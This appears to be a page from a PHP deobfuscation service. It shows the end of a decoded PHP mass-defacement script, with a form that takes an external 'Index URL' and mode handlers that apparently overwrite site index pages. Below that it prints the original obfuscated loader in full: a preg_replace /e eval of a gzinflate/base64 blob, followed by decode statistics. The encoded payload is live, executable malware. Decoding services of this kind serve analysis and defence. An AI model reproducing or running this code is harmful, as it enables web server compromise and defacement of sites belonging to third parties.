<tr><td><b>Index URL : </b><input size="35" type="text" name="defpage" value="http://tolizuga.esy.es/tolizuga.html"></tr></td>
</table>
<input class=submit type="submit" value="Baslat Reis !!!" name="Submit">
</form>';
}
$milaf_el_index = $_POST['defpage'];
if($_POST['form_action'] == 1) {
if($_POST['mode']==1) { exec_mode_1($milaf_el_index, $hacker); }
if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }
if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }
}
if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }
echo '</body>
</html>';Did this file decode correctly?
Original Code
<?php
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TVnXDoW4dv2XeblJuAq9KU+0Q+/lABopovfe+fqcyVwpebAsbCNk7+VVxLwW1X+vxdwnWfFvf4D/+R9g8cc///jzJvA/b5L49fCvcX/eCPXryd8Y8+vpXxN+jfh77q81JPb3O/+7DvnXGPr3GPpbh/7m8c/v+V/riL/m/t8zQv3jDVaJ375EcCKhifaMIPTmUXM8beAkzbn+OFsFQuevduaKLkrmpSmNiS30WWaLfyTwatGvVmTAm+0gUFnUjlLs84IAHQEg+rYIjZ9M+aJUArwleYE4gY2laKHrEoBteaFgApCWYXsE/J7gWZBv+0rd+mv7ReLv1+JIsCsJkAFxkAwprKQG8Mjqc7OfZffG7TCXLfKaTep7+pOcG43U8DSBgzKEWPxlsMzUm8iIyDT44r1GZ99W+MYhSyPKrTqtsWLosEjmUUkNoOTj2L986Bpo4n93MXnbVgWtuXz9Qgs9TwttK+WZXLnKt5sSTvVpLcFeLQAkKTBicjcTEANAMIxl0Kf54QPY4NmOJQ6CIORZLrcow6PC9GMqX5ldUwVc23pw+XV5NtArZJf/aNyWs9W2WNlBTCnIxRyJf4MvxiCTzGm4D2DyyFJTvMSsHBbCQJkHu726PGYXJPA3e7naKXUek88hk5doxjI18oniacZbGGN2l40a4JM/LPdRAlFoDFaoHNmt9N4uAKcVKJpKEy2sY/nTSyNTtpsSPOg7QNw7G9PXSx0w0eTSXEhAkUI0PfpCd9sx5igL8hEYNrDBbz17cMp5aPPWdRqqy4rBnbm5zywjpXF2QTD1ENdcsagQ66nD3z6Ls9K7JKWxQdJjiRAfDYKXr1JywItJk9YaHTaBudp/WnLId/jrfDva6XZ2HeLlXAu3ovEnClp9vvUUlZpshVuR7aXhBOEs4tp3rm+PJ88xLxyQ80xoglVaIN1sXKZ1lg517HReIXdn3lcvCRjUpSyXnmL7ZjfKj8wzgRkxd4EEaE28gqsdLFmerUYY8M/ZpgRMTvrdebTgByeTdCC61KAKV64NNE9U7YPr7WdepPtexXzTo02pPIXPtnKxapRH0LK9MSkcRIDPtbqmVHNzxmG43ZbG7lURt7gMiMx1ixT1ymQ0FZlGbpWOfFyrV8l1RQ4oR7m5QP4uaIUqezE3pXr5sXsCkfwdbR6rirE+ahVJgAGaF/ii9oaoJgKueNMy2sNhz0DU+hwpBpRORI2PK95K/cC9s+MqIbLQqrA9v8++f3CNJKYnMBQJVghfT523csf0u1SvYRZwsvocevK+ZbzVbxMXONw7bSzMkH0Pa28MeFXTAEH5kfEcduCFTyy5OM6GBpMcTeJnyxNEjhifiA23kr7kyvuZyojjE1ziKeXWtzePXOFTkDFfhi29TMyggrOFmaxyWJHaEs3MJDr/rYQF99ybdXsMlNz62zYmTHH8FdWervNWePYpxfcN25RsjFInfSxR2rGD4cn3QJXQ90671UbQlR45FAty1ZnJ+BCnIKfXZujLkRwSAIFAURTVUNfeT2YdH+7OkkOkJgEt2vIm8sujNH0zS8H3d1sMKuE6Z9H7FPnBOhcbueCu31zeNPHhdSP2DIRpmkHc+aiXMkiESwlOi+ZXYBh+tg3RhKM84M+qSW3M73QwXW1hgGgUPo/qYoAMJAX1OGEgdDKJSSIhREffF2kyGOGU4+DTqGyQWSv588O1igTKEc2fZdcFYj7eTf9UJmZ2cmUrGwHYzXmULMpxt9MN8Nr58Kkk2j3blTttcjqLGpZjwYWckqRg22ELhtWXQFGH9g0rg8861ktZg4/Sy7k8bMOhU0al7BqCq9Lj6o98aa83sISA2kjwy0PWMhCu2lNCo/MTvTFkomasgFYqR2Mv1O3nBrBLmSvKx55o8XzJ8smYOouYjPtSr5aeNjB60QP51eAAGprMJn3asI0JX5VJOnSJWaWHNvMy2Lj4UD1NFz9Jok26k58AqLtgJg8kXM6ka3W281FCGSFGf7CjHBKS+3dRA4KyelAbpdmKOznNzP7AzgNSeJJH7pNS1p4mgWG98AKkHn5eEuHYZamg6jEsDjrn7IJyi8ZnDjD8QvqSAXkYRMW3W58ciskDbKrf+STfmwJ6WjPcgkPU4j0pome9dFfNirfXtT5FcfvYlRdzwPfD14GTCw9xc7GBpKkeCS1UhO9CR9RgRv3zuMZF0Q4dmfZ3zvA23sd7IRJsMWouk62bf1FsxKMgMP1P62Tb8NMv0ES/W+1YodoEVTqkvA3bn2RTHL4wJpaHtkv7OY/7bo7p+omdxudahzoqtuwJ8fGKDmi68yC1PRxZsNas2/bJpOgYtkItnrPO2b251vagq0Hf5MRkiKEJheqiLCOx5BPcSUwPNSKulXRlmP0zEy7A+mU5i92A5miMTgTEKuIpVoXxgJ+xJwiw0/uGgKmVDUkgNuRf3em4btD92HwUF755bpIV0P4qWSeqcDy8o8se//Bbu7KfCiC/OW66bOPoT7ocveXJJFRDmI+CtJr3MwiketFEogCyrM4KsAlo5Ii8kRf9hAKi72E1uEVMvR2/WF74DrScbd7HqYNw9GUhz2fxCvES2FFnpHVfV6ApkGJHHhqQ3M93f+Yg4lRG20GPIcpM5WNetjifZjCFD56kB3LX6BxPmjHbkUA3flo8rHecyWa82saP8diQhfLAN2q+V4ex32TLXo05GVyqHfr+yDJbaiOPV4DtptzUXUE5vUEqaN63aQZzOChJTKoAB+xCII/PFo+DqXiJtNuuAo3cT2+0yN3D/ZAcuBfmSShGNdW66DWZcuvFQqOtLJtEF5UJ4FAOqHUBdJ/63rPepHI56ap0HyMqBP6oA8PQ6JWMZphFe//b7dpOxANRdLiOwfjtd7rl+ycoxnvs6HK901iWJKEzGs2fqlIDPeuE1S5nLD4Svyn/hk4PYrLse/uMqnUAkSackipBpl8lv6xxQTJUyR3tdcGwCFPIipiVp0Q10836sFlfZWiyAk0RjMqUHSXh8wX4et8weWZNKT4S45Wrbp1TKGV1wfbaljMfmPiao2+ksHMlIXhVrnqNTDYYF+zZ0rgqwZovZHDrmZCiX0ZRTbTkkFMVIASRgtxzvkwq2BmemzOHSa08iMLAPMEa9Gu93Ey/kRWdYo19kUR10lw6Nix1SltEg9BXPXkbKbvD0GTo6rgiNGz3oIKu2fuLsAiC36sreh1xtbZOovvdAF+R+9o1PHpbrI7YIUaJ7IxPcB4919u0tuHWcvD8qeuqPXX1ftzoqoBTH6/9O61p0mpKb85nXSVq9fgztiAvy4bKNXZ5/3NrP5JxnztdLC02nR6KqK4NpmPpujEVo6PDhuDe1R+6qGlqcKLbqjR/ZkyZjNsh2TLcaVyk225fPtXQFZfvOf0X2MkbwzfZXdQ8BH48WFkEm1u/AuM3chh2XfHqWY82srO4TnF7KbiibZVt86R6HvTDj2ecT1P/ePdYGLoskaCt3ou7kqjrVbDlpWd8ATZRekclZyqZvo6fZhs99qIN7MHhRI1zSSHUb8e+3TS/Mvh1cTUqkWgZ23qKUdtloZr+XGD7ccWpG71PHkI0C13gG2A/DAJm9I0ElrKnNDQ/1S18mN9trBC7VstpF6FjBlajcfzesgWAu6xXFO9lcJPBEOQcHW2pOW+jhQukd0wOX9w3MmCnx6e7P95z9peyaAjw68LfTwnEbnEOKZOYjXFn2fvgOlfNob0/ELRn1IRQLcnFpi9B/Ed8OEZKXFGtiI9MHUPFyHZ0fRO2SMhHfwIswi1QOO6uuEVWqzSgg5CcVBp/RzuSYJ4NPYtKWprgis4emobGzo2Nv9Qbt5o7sWzLMM/8fAOTgaEQoUlLsAZgsoBPCI2mT/StCNllgcnxHsMxjPxsSanARoI16IRVwtEuhGWD5D0786P10psNyicnWML9mtXVSinHNxdaTIxdEAXDnXA2T4uSNz3AOXHYjjdcIngdbTalcvn+VHMwJQnzRvzl0A+kW3cH+PD04TWj+37uXnfPES89WCTfcpp1YJzjFv3Kx3cXMJgT+G+WoE45OugyAIcOO0XTYWCPfcz2MruiseA2oAEUX+V9KEZtEyYtRE5zDnsMpQaNAGRG2CjxV1pXZKd8BGdS06eaQn/yz1/67LzQ4hKc3QC0GbdSZ9NbG5jDKwxzaRzegYi/AKMOOK1g1zDangNGGfdZPGECoZyESOf6DgipAB7DlmMcuF9i4PAudwxQ6oKsd0/X+VB8XdbQuymuo+YFGXBv+4swR/LIFi2m5IkwZU0Iw4/OGWugdN+DbmWxjKc2HJledVqr8FvuYPr1iuhhLYz1kF2hk9PYKVYY/FIpL/EmaIgvqBcagIRv7F/2kfXJA9eNmq8iTVUCjQHG2FvUxTecYKtUw5Ut/BafvDsZrrlX4xTKHH1StOfXUDhrT91tQdcN4Vv3veGplCYq/C+ixcYU4N9MNvDlA1UUucPRQM+mkj5wPLyZTnY81WKxZIu48oltCnpu9GfbPdw5y/5jflF1h355smbTU4Ql/MMfpXrAjUQH0tHTzHc88KHD6a0O+eFoBTHKYjvuTlYrJ/zMCoi6VKA0H4Pj9I02I1OmfukATUf7gkub6E/s4pNtTAk+AQFN3vgtHkABG42BsZTOiz4QBcoJECppvpXfyr8bEIXkoNTHU4b2nzinAkCq6Xd+wGMWvslNFKrdLe4uehmLz51nnOrPg4wB+RA8bokYr61TOSz68QupumAl50+PISMHff315+lgup91ZtcLXSDzBnSQcRxg69yLHbbv0U2hx9XtHGA/BwZnTXpz62p11qBzNALWdOIuqTlHwexAK1NrhgdiR9laYhEyi39Pc3l4lCWFll87RMR+/NtRIh6cwEzUf1W4eYP74oNz5b7ul7EZwIx1SZ310VpnnU+FVCidjPJzJtFFJqYvJtBq+EV118Dc9s6nOKGmE0z2RFrO1r/Mxz3T+PU40rSsdTMM89VmXC2L7IkjIqs0lm6178QCs80D4ibd0aQXqU7d6dFxTzJgyysGEb7zRvQExI+oeAm65OhXdvLaHnEHYtPm6Xx+sacLEgpqvQ1Zq+hs6Jvj0BBwuHpNu3PufDEi5AdibEndMfUxV+4q5H6Bhq3m4ugZpn2zjAb1tOJWVFeve9LV03CcXS5/pA2BgtMujPjhlELtkHawU54VPBeK3KGasvvzy6KHg7jUJcFtFrEFQNO7N56xVrQM2SZROQf+0dBhjiNPHQ+yZCkgrIfOmi6Z9/706/v8HPzqyzJ9WfD8hle4NNcc+gY2OhlkdS8/O9vAx6c1JPmJLst3dj9NaslLS1awv7lFnxIHYbUmaMxw7TCTXvtS9KnJdpnTSv/o+NjSBP8yffnLOso4HDMRPuvpXbDAWR78E2TClfqRW7oKjhddhKMYmgNeHTizY7kMn5ntCjEBTAm3xtJazV5SrV+Qd+htjv2nO1GCXrbG2iFa8xaGo5ewAHyZ5NZRaNlKBKAdq+n8BUhD5fwwEyEB/CW81/1AbkHy3LzMv4DuPTbfSCmonAVqplF7Yx3Ad7PXiAfPVQN6ezesCa66r1n0oXPXRuvehezYsag+ttIwuq3QmhXCsMJSC9SYPFvYzH6+h6L16Ss8kA82AyYKYZFrHrFjljyJinBimGvlSSHEPCHf/Zx+wtmhlZ9BPe7dlYCPgGrgR9Ef/Xj6KlugcWL86zUuxQzb4prrnWBGKCrXyP4wUVbdEIiJLH216TaoBSZd9vbULppG4WSP0kjgldLOr8nS5JkxzRWhIdn7PaBJs5BwRnXGX/oMi3J3RClELXunWZVH7a9brJjV0updCXakVz+PEZ9fbTNLqaV+BGEUVRnIYbJPaqNyeu4vo+F9rkRRypbNZLUqPONb8t/d5ImLUgGoojXQFXtsN1HvEXTqfU3OAKOnjkSl1wPDbou5ycPv87KeFwGKyX76kqRUOMh9CLAFPq43KiRE0xQHFfpYqtcba5BMcOj5UPZVR+L4evqcP6Hp9npnxMB9Ge7rds9zC/FuE0W4GuOhBv2FbLQyNr7w4pVENy39yPxhqm8lDkFGu5513CnTjCg4WaXrxIjEC0JR1qxe1oiEkde3QcIfyfk4tcTwY8VtBicgWMHdon2opq04PMX9iGINNY3YH5FskHPrd+DVltvnCh+nom0Y6nEoYbo1XabTM6qoQ63p2ldcAKnD/YJDU31CWPInCT0Zatxj51wyMGoK69pdpibxitUlw4nTNKW+9s0V5p58ExAi4rJafPDRmQ1nVTIqHd8espYwqOkBJsgWgYsinCbsLNYmvNKd7Kl95m3eZUdyDrrTipBbZ8/tdQB++cVu9YvkiN5qeseU0I8Wl+cF8cgsE7mttEmKOfFCxvdbFt/B/AzmVypLLbthMisBsIyJyyzljiH5jIa9EU8OfKoEFzK1eeKDtUYfGvm8t+anSEktUzJ/rDO7WWSk2wvSCTQokZqtEe68sWywE+66f27KTtVxnRpLciQSPukmiPwxAeXn7LfuZb5Gs3Funj7XJrjkrIU69CCW9cQOQHQ5ghe3GXY/6H8PAEZAChGbjM+YWF6fPj8fPf3l61+4/KaLPO79LgG6o9KENrSs6NSMWTIsL2cOWQlBHyh5letZGVckyXgsChfNF1L8L2OUUncGLQDz2Ff9Vqf246rGfCv3+fZYfzNyl/EaA9bRmCTtEvCOseR8Vm7L4zGVlasCydSSgqksfhv613F/wbOZf8qUENp2CBX4aczqXeBP8vqgzeF4Vd6L5MUCayLnJiwy3WFa15vpwn73rLXGzknje3Y71W5osKd+e5qR7Drk9eSVDO8NSgwm7H5JPrWRm9IGMgphLENILhKzF6fsy6nKYxERS4FoKwpViR3grtYhtRwz+8o1N7pO+kxNPUv2aC6tUDpG3ks8FNgS14B7OC5nsUGYIjMjRefEV36D5G5srpSWYHxKH/Gq1V69SXosKKySc24RKn9TTw8Wzw1yDrwQuukVYbec4ilnq71t5pVRBRXqRTmxOw5F7jr3Q9Ijjq5GB/bKQ1rGeof3HznSWU/Eb8znxM975WFDKLhrnbmWg2U6Y5okr8NO5oCIM7mFfTs4HisP3ueseQEue4dtgutllezhlEnY0PN5hCPeCE1Ct5hfSv4JwXwPI0ILjvnSspfjP/Tg7ya3hmCJtmuamVPWIzK3ZhX71Pd2YaUUb7q6FjQZ6HEpK+8TxU/kHg4nuTCJK9GWrch1uCdRS+uU2tS62cwkRpTOR8LT+9Q0TBuRK1wDW2sKurkO8KK8pNvkEJ0p9CYW4jHgzipWXyNpmvi3o+vr1Gnu+rT5J4R50odVtva3lR8WeSiJDWfMfP75B3HjaiNgbVC9kfrnMCj0NgsZT5itnVdN/5YMLnwrQCqVjjEIk6kPUhFb8Rfzkw9sckQjuDbmgnjsoZVpHsT1pV79Pp+W035n1HR4H8AyXI/VpoVOVYmoivYROBMksDhUdz7Z5GooGr1k3eIa2msh+wXtO515Rc0rnBnrtTokR26iY4AwvP/lrWtJgY65d2SVfB0ZEYoz/Z0yieD7gNF9Xlie81OM7D9dzL3Gtpcq7kC18+a9lvIiU2bl6sLoR2i5X2yRGdAnplxXZWw2/4MZIaB+FnzEVgLUMUPv4RdIfocD0ERcpI7StHreoacuJqrG8jzljQhH4XpLZL9a3jhgRVk3ynplzvFaWc00RcLdIxIEKhTcqrfUcPiPIQ1aVIUmVTg8R3hp8in//dpdre2hYeiI8duf+jsxd54/3hDi+YPDz6hbOe3kvX65kUtQP4E4Pf0uK0Oh07bz2x/adCfLN+0H/dNS6o3usSQej7t4mKjw1/D8+Y74WS0WiMtWXrFMapTcb6lWM28BoqqGLdknEMriKlFAAKXId+DFDmfKGocGiiDSjjgHFqint0P3So1gsDvqC8pt6V8iiiex7TWBKDfV2KzjUEMbR9X3GKRYp0002AixAC1I4OzNxJCI4AAulfB1JkM43r24Z9AF1YZ9RmUROoqs92WiRGY4uXCeze6meF0Zh86gjXcaLfW4ajPGVh48xOKsxPy4EkiIUuFn+LHz1IeYVz1HOurZmJARcc1FfAenBqpTCx6I98+FpJ2bXh+UoaA+rZGSVD4D+GDbZ5ITW1OvcApB8nK4DVm0vRnmIE+yqi3hA169nT5H7uvHnGu/MBTOuvyVBttwovdhdVO+uTA2X6jE4eJg7Rb76/8MCuwTZHNV8ywnoF239h2LTeLDdpDcuUgLfV85Yw0TP4uPK/N4d7dPx0dCRTnjTC/FMU0p4qKzI/9WrZa75o/jQ58MfcDJv7ffQ3mxD41cqrK0A8h+NjFLR4OhC6GBNK5Ghj80TL5C1NH9wkBrTKT5yY3+FkMNrhYj2vCgzdPS3N6f25U4xzl6Rnoerhfb11TNyI9i1Gfn4pex1e+H3tAK3SQOgQFMkbXnxCDlYPAVzBz0xVK5VnxOFlN/NxniaQe5cBVoCd8NW0I5gPeSKajQhri60wyL2/HBUOLOe0UwdkXpZy/WGWZU8NI/8rs2h5xU2f6KyyTI9dTqwY+wVjUlp7Oibdp9M3OsIf6XKfCw7tt2PpzgzrAEjDVrZ+gjMbohm3yNaevuA+XA4Of24oKRurw94DX50Xd3NtwygRQo+zOnExJ2zd3IflJDFrTeUKbQEYw5v0yAyaD04+/+1T9WwxTAVPm45kt08fvICJE41Qh6A2qxLNvare9HHzKbjMzAWjdhD2BApXIAd1LOUowYLzXGAnmrWp8T3K1Anu0ZS6jJg4DxR8SbuXsSJE+AzMedKlb0VToLU7QaLLFUNP1hr5dJ2x7Ra2GOE/pidpTmR2fe6vIp/dmoyuwMItoPPurirHs8lN+YlaeXmI7X5Q2YSb1x5EMT4euXnQobbewqox9nD3jL6zwFwn/RBKoGr3bsNSvNi6CQPF3XcNT8z5chLOOeC/gTuxARSgHxFYocJr07jt+dtdn1XOrOuuNqiX4U/A5fpPGUkwAq/Vd6/hPe0CBRXMaGUCh5/giynYs6cFNa7UXQIzTY0KBRAuEkSN9zA5eEGUEO8W5dLK6OT62FGKNWyKJaqiV7YSRpll0zcjm9l49IWZShhdXxDCMDP4xE0Ml9mJmNZAsIQfosP+U//rwR+v8ayv7xzz/++Pf/+h8='\x29\x29\x29\x3B","");
?>Function Calls
| gzinflate | 5 |
| drisdi70361 | 1 |
| preg_replace | 4 |
| base64_decode | 5 |
Stats
| MD5 | 749980ee9eee5c350fd4d3947533cf2e |
| Eval Count | 9 |
| Decode Time | 124 ms |